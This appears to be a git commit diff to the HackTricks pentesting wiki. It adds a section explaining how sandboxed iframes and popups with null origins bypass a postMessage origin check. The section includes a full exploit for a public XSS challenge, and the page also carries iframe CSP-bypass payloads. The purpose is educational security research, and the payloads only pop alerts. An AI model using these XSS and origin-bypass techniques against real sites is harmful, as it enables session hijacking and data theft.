GitBook: [#3146] No subject
This commit is contained in:
parent
6712e47528
commit
9c1fd6ac98
@ -468,7 +468,7 @@
|
||||
* [Debugging Client Side JS](pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md)
|
||||
* [Server Side XSS (Dynamic PDF)](pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)
|
||||
* [XSS Tools](pentesting-web/xss-cross-site-scripting/xss-tools.md)
|
||||
* [Iframes in XSS and CSP](pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md)
|
||||
* [Iframes in XSS, CSP and SOP](pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md)
|
||||
* [Other JS Tricks](pentesting-web/xss-cross-site-scripting/other-js-tricks.md)
|
||||
* [Steal Info JS](pentesting-web/xss-cross-site-scripting/steal-info-js.md)
|
||||
* [XSSI (Cross-Site Script Inclusion)](pentesting-web/xssi-cross-site-script-inclusion.md)
|
||||
|
@ -1,4 +1,4 @@
|
||||
|
||||
# Iframes in XSS, CSP and SOP
|
||||
|
||||
<details>
|
||||
|
||||
@ -16,10 +16,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
</details>
|
||||
|
||||
## Iframes in XSS, CSP and SOP
|
||||
|
||||
# Iframes in XSS and CSP
|
||||
|
||||
## Iframes in XSS
|
||||
### Iframes in XSS
|
||||
|
||||
There are 3 ways to indicate the content of an iframed page:
|
||||
|
||||
@ -27,7 +26,7 @@ There are 3 ways to indicate the content of an iframed page:
|
||||
* Via `src` indicating the content using the `data:` protocol
|
||||
* Via `srcdoc` indicating the content
|
||||
|
||||
#### Accesing Parent & Child vars <a href="#accesing_parent__child_vars_5" id="accesing_parent__child_vars_5"></a>
|
||||
**Accesing Parent & Child vars**
|
||||
|
||||
```html
|
||||
<html>
|
||||
@ -63,7 +62,7 @@ alert(parent.secret)
|
||||
If you access the previous html via a http server (like `python3 -m http.server`) you will notice that all the scripts will be executed (as there is no CSP preventing it)., **the parent won’t be able to access the `secret` var inside any iframe** and **only the iframes if2 & if3 (which are considered to be same-site) can access the secret** in the original window.\
|
||||
Note how if4 is considered to have `null` origin.
|
||||
|
||||
### Iframes with CSP <a href="#iframes_with_csp_40" id="iframes_with_csp_40"></a>
|
||||
#### Iframes with CSP <a href="#iframes_with_csp_40" id="iframes_with_csp_40"></a>
|
||||
|
||||
{% hint style="info" %}
|
||||
Please, note how in the following bypasses the response to the iframed page doesn't contain any CSP header that prevents JS execution.
|
||||
@ -117,7 +116,7 @@ if __name__ == "__main__":
|
||||
app.run()
|
||||
```
|
||||
|
||||
### Other Payloads found on the wild <a href="#other_payloads_found_on_the_wild_64" id="other_payloads_found_on_the_wild_64"></a>
|
||||
#### Other Payloads found on the wild <a href="#other_payloads_found_on_the_wild_64" id="other_payloads_found_on_the_wild_64"></a>
|
||||
|
||||
```html
|
||||
<!-- This one requires the data: scheme to be allowed -->
|
||||
@ -128,7 +127,7 @@ if __name__ == "__main__":
|
||||
<iframe src='data:text/html,<script defer="true" src="data:text/javascript,document.body.innerText=/hello/"></script>'></iframe>
|
||||
```
|
||||
|
||||
### Iframe sandbox
|
||||
#### Iframe sandbox
|
||||
|
||||
The `sandbox` attribute enables an extra set of restrictions for the content in the iframe. **By default, no restriction is applied.**
|
||||
|
||||
@ -149,6 +148,73 @@ The value of the `sandbox` attribute can either be empty (then all restrictions
|
||||
<iframe src="demo_iframe_sandbox.htm" sandbox></iframe>
|
||||
```
|
||||
|
||||
### Iframes in SOP
|
||||
|
||||
In this [**challenge**](https://github.com/terjanq/same-origin-xss) created by [**NDevTK**](https://github.com/NDevTK) and [**Terjanq**](https://github.com/terjanq) **** you need you need to exploit a XSS in the coded
|
||||
|
||||
```javascript
|
||||
const identifier = '4a600cd2d4f9aa1cfb5aa786';
|
||||
onmessage = e => {
|
||||
const data = e.data;
|
||||
if (e.origin !== window.origin && data.identifier !== identifier) return;
|
||||
if (data.type === 'render') {
|
||||
renderContainer.innerHTML = data.body;
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
The main problem is that the [**main page**](https://so-xss.terjanq.me) uses DomPurify to send the `data.body`, so in order to send your own html data to that code you need to **bypass** `e.origin !== window.origin`.
|
||||
|
||||
#### SOP bypass 1
|
||||
|
||||
When `//example.org` is embeded into a **sandboxed iframe**, then the page's **origin** will be **`null`**, i.e. `window.origin === 'null'`. So just by embedding the iframe via `<iframe sandbox="allow-scripts" src="https://so-xss.terjanq.me/iframe.php">` we could force the `null` origin.
|
||||
|
||||
If the page was **embeddable** you could bypass that protection that way (cookies might also need to be set to `SameSite=None`).
|
||||
|
||||
#### SOP bypass 2
|
||||
|
||||
The lesser known fact is that when the **sandbox value `allow-popups` is set** then the **opened popup** will **inherit** all the **sandboxed attributes** unless `allow-popups-to-escape-sandbox` is set.
|
||||
|
||||
#### Challenge Solution
|
||||
|
||||
Therefore, for this challenge, one could **create** an **iframe**, **open a popup** to the page with the vulnerable XSS code handler (`/iframe.php`), as `window.origin === e.origin` because both are `null` it's possible to **send a payload that will exploit the XSS**.
|
||||
|
||||
That **payload** will get the **identifier** and send a **XSS** it **back to the top page** (the page that open the popup), **which** will **change location** to the **vulnerable** `/iframe.php`. Because the identifier is known, it doesn't matter that the condition `window.origin === e.origin` is not satisfied (remember, the origin is the **popup** from the iframe which has **origin** **`null`**) because `data.identifier === identifier`. Then, the **XSS will trigger again**, this time in the correct origin.
|
||||
|
||||
```html
|
||||
<body>
|
||||
<script>
|
||||
f = document.createElement('iframe');
|
||||
|
||||
// Needed flags
|
||||
f.sandbox = 'allow-scripts allow-popups allow-top-navigation';
|
||||
|
||||
// Second communication with /iframe.php (this is the top page relocated)
|
||||
// This will execute the alert in the correct origin
|
||||
const payload = `x=opener.top;opener.postMessage(1,'*');setTimeout(()=>{
|
||||
x.postMessage({type:'render',identifier,body:'<img/src/onerror=alert(localStorage.html)>'},'*');
|
||||
},1000);`.replaceAll('\n',' ');
|
||||
|
||||
// Initial communication
|
||||
// Open /iframe.php in a popup, both iframes and popup will have "null" as origin
|
||||
// Then, bypass window.origin === e.origin to steal the identifier and communicate
|
||||
// with the top with the second XSS payload
|
||||
f.srcdoc = `
|
||||
<h1>Click me!</h1>
|
||||
<script>
|
||||
onclick = e => {
|
||||
let w = open('https://so-xss.terjanq.me/iframe.php');
|
||||
onmessage = e => top.location = 'https://so-xss.terjanq.me/iframe.php';
|
||||
setTimeout(_ => {
|
||||
w.postMessage({type: "render", body: "<audio/src/onerror=\\"${payload}\\">"}, '*')
|
||||
}, 1000);
|
||||
};
|
||||
<\/script>
|
||||
`
|
||||
document.body.appendChild(f);
|
||||
</script>
|
||||
</body>
|
||||
```
|
||||
|
||||
<details>
|
||||
|
||||
@ -165,5 +231,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user